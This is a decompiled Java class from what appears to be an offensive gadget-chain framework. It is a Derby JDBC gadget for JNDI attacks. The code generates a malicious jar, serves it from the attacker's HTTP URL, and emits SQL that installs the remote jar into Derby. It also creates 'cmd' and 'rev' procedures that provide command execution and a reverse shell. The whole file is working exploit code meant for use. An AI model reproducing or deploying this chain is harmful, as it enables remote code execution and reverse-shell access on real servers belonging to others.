package com.ar3h.chains.gadget.impl.common.jdbc.derby.multisql;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.param.Param;
import com.ar3h.chains.common.util.CommonUtil;
import com.ar3h.chains.common.util.JarUtil;
import com.ar3h.chains.common.util.JavassistHelper;
import com.ar3h.chains.gadget.impl.common.jdbc.derby.template.DerbyJarTemplate;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;

@GadgetAnnotation(name = "Derby 远程加载jar包-多SQL 仅适用于JNDI模块", description = "本链会从远程获取jar包并初始化，注意这里不会RCE，后续RCE需要调用里面的函数\n总共4条sql语句，加载jar包、创建PROCEDURE\nsqlList.add(\"CALL SQLJ.INSTALL_JAR('\" + jarHttpUrl +\"', 'APP.\" + className + \"', 0)\");\nsqlList.add(\"CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'APP.\" + className + \"')\");\nsqlList.add(\"CREATE PROCEDURE cmd(IN cmd VARCHAR(255)) PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME '\" + className + \".exec'\");\nsqlList.add(\"CREATE PROCEDURE rev(IN host VARCHAR(255), IN port VARCHAR(255)) PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME '\" + className + \".rev'\");", dependencies = {"derby:org.apache.derby.jdbc.EmbeddedDriver"}, authors = {Authors.X1r0z})
@GadgetTags(tags = {Tag.DerbyJdbcUrl, Tag.JdbcUrlWithSQLChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/derby/multisql/DerbyInstallJdbc.class */
public class DerbyInstallJdbc implements Gadget {

    @Param(name = "数据库名")
    public String database = "dbtest";
    public String driverClassName = "org.apache.derby.jdbc.EmbeddedDriver";
    GadgetContext context;

    public Map getObject() throws Exception {
        String str = "jdbc:derby:memory:" + this.database + ";create=true";
        String randomString = CommonUtil.getRandomString(10);
        JavassistHelper javassistHelper = new JavassistHelper(DerbyJarTemplate.class);
        javassistHelper.setClassName(randomString);
        byte[] create = JarUtil.create(randomString, javassistHelper.getBytecode());
        String str2 = randomString + ".jar";
        HashMap hashMap = new HashMap();
        hashMap.put(str2, create);
        this.context.put(ContextTag.CACHE_FILES_MAP, hashMap);
        String str3 = this.context.get(ContextTag.JNDI_HTTP_URL) + str2;
        this.context.put("jarHttpUrl", str3);
        HashMap hashMap2 = new HashMap();
        ArrayList arrayList = new ArrayList();
        arrayList.add("CALL SQLJ.INSTALL_JAR('" + str3 + "', 'APP." + randomString + "', 0)");
        arrayList.add("CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'APP." + randomString + "')");
        arrayList.add("CREATE PROCEDURE cmd(IN cmd VARCHAR(255)) PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME '" + randomString + ".exec'");
        arrayList.add("CREATE PROCEDURE rev(IN host VARCHAR(255), IN port VARCHAR(255)) PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME '" + randomString + ".rev'");
        hashMap2.put(ContextTag.JDBC_DRIVER, this.driverClassName);
        hashMap2.put(ContextTag.JDBC_URL, str);
        hashMap2.put(ContextTag.JDBC_URL_SQL_LIST, arrayList);
        return hashMap2;
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        this.context = gadgetContext;
        Map object = getObject();
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return object;
    }
}
